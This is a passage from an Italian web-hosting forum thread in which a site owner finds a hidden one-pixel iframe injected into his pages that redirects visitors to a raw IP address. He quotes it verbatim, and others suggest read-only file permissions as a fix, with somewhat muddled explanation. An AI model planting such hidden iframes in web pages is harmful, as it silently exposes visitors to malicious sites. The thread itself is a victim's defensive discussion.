Pagina 1 di 2 1 2 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 12
  1. #1

    Virus su una pagina internet di un mio sito

    salve a tutti ho notato che c'è un tentativo di redirect ad un sito (che non ho visitato) !
    il problema è che il sito in questione è mio e io ovviamente non ho mai inserito quella porzione di codice...
    il codice in questione è un'iframe nascosto che fa un redirect ad un sito
    <iframe src='http://58.65.239.180/' width='1' height='1' style='visibility: hidden;'></iframe>

    ma come può essere successo che il codice compaia in alcune delle mie pagine ?
    io solo ho accesso al server via ftp !

  2. #2
    Utente di HTML.it L'avatar di Phantom
    Registrato dal
    Jul 1999
    Messaggi
    4,099
    Basta che trovino un buco da qualche parte ( di uno script per esempio ) e modificano il contenuto. Soluzione : chmod 444 pagina.html / php

    Bye
    Asus P5QPRO - Core2Quad Q9550 - 8GB DDR2 PC6400 - 6x1 TB 32MB cache - 2xHD4870 Cross - Raffreddamento full liquido - XP64Bit

  3. #3
    ma cosi facendo imposto i permessi su "Permesso di lettura (r)"
    non è un problema se la pagina è una pagina che accede ad un db ?

  4. #4
    Utente di HTML.it L'avatar di Phantom
    Registrato dal
    Jul 1999
    Messaggi
    4,099
    No, non è un problema. il 444 permette solo all'owner di modificare la pagina, il 644 anche al nobody. chi entra entra come nobody quindi lo blocchi. Le pagine dinamiche non vengono scritte ma leggono il contenuto del db e lo estrapolano sul browser. il codice della pagina non varia. Varia quello che il browser legge

    Bye
    Asus P5QPRO - Core2Quad Q9550 - 8GB DDR2 PC6400 - 6x1 TB 32MB cache - 2xHD4870 Cross - Raffreddamento full liquido - XP64Bit

  5. #5
    speravo si potessero modificare i paramtri con il semplice client ftp ma non si riesce a cambiare nulla !
    che sia un problema di permessi sul server ?

  6. #6
    Utente di HTML.it L'avatar di Phantom
    Registrato dal
    Jul 1999
    Messaggi
    4,099
    Se non riesci da ftp fallo da file manager ( se l'hai ) oppure da telnet / ssh ( se li hai abilitati )

    Bye
    Asus P5QPRO - Core2Quad Q9550 - 8GB DDR2 PC6400 - 6x1 TB 32MB cache - 2xHD4870 Cross - Raffreddamento full liquido - XP64Bit

  7. #7
    Utente di HTML.it L'avatar di Nkosi
    Registrato dal
    Feb 2003
    Messaggi
    412
    Originariamente inviato da Phantom
    Se non riesci da ftp fallo da file manager ( se l'hai ) oppure da telnet / ssh ( se li hai abilitati )

    Bye
    In pratica posso settare a 444 tutto il sito? è un operazione da fare file per file o si può anche con un solo comando? per esempio usando Fetch seleziono tutti i file (cartelle comprese) e poi sparo il 444? Si può?

  8. #8
    non serve per aiutarti a risolvere, ma se vuoi fare una lettura interessante riguardo il tuo problema

    http://www.suspectfile.com/blog/?postid=27
    Begun the Clone War has

    Sì sì, mi hanno fatto redattore --- SuspectFile

  9. #9
    ottima risorsa il problema è capire come possano inserire il codice in una pagina !

  10. #10
    un buco nel server o nel sito, e il gioco è fatto. comunque, anche il sito di roberto vecchioni è stato interessato da un problema simile
    Begun the Clone War has

    Sì sì, mi hanno fatto redattore --- SuspectFile

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.